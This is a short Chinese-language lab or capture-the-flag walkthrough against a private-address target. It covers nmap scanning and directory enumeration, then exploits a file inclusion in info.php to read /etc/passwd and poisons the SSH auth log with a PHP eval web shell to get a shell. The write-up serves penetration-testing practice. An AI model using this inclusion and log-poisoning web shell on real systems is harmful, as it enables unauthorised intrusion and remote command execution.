1.主机发现 扫描ip及端口
2.端口扫描 nmap192.168.233.131 有三个开放的端口
nmap -sC -sV -O 192.168.233.131
-sC常见漏洞脚本扫描 -sV开放端口服务/版本号 -O操作系统探测
3.目录扫描
DIRECTORY: http://192.168.233.131/antibot_image/
+ http://192.168.233.131/index.html (CODE:200|SIZE:652)
+ http://192.168.233.131/server-status (CODE:403|SIZE:280)
namp没全扫出来
4.访问192.168.233.131:8888 发现有个登录框 但是没啥子用
5.访问antibot_image目录 http://192.168.233.131/antibot_image/
继续访问一下antibots/目录 感觉这个跟爬虫的差不多
这个info.php
6.查看info.php的网页源码,发现存在文件包含漏洞
7.在URL后面输入 ?image=/etc/passwd (用image参数传入想要获取的文件路径)
成功显示,说明存在文件包含漏洞
看这个发现端口没全部扫出来 再用这个扫一下nmap -A 192.168.233.131 -p-
-A: 这个选项启用了“侵略性扫描”,包括操作系统检测、版本检测、脚本扫描和跟踪路由等功能。侵略性扫描通常会提供更多的信息,但也可能引起目标系统的注意。
-p-: 这个选项告诉 nmap 扫描目标系统上的所有可能的端口。扫描所有端口可能会耗费一定的时间,但可以全面了解目标系统上开放的哪些端口,以及哪些端口可能存在漏洞。
还有个2211端口 可以ssh
ssh "<?php @eval($_POST['cmd']);?>"@192.168.233.131 -p 2211
然后在网页端查看ubuntu报错信息:/var/log/auth.log
/var/log/auth.log 记录了所有和用户认证相关的日志 。无论是我们通过 ssh 登录,还是通过 sudo 执行命令都会在 auth.log 中产生记录。
成功getshell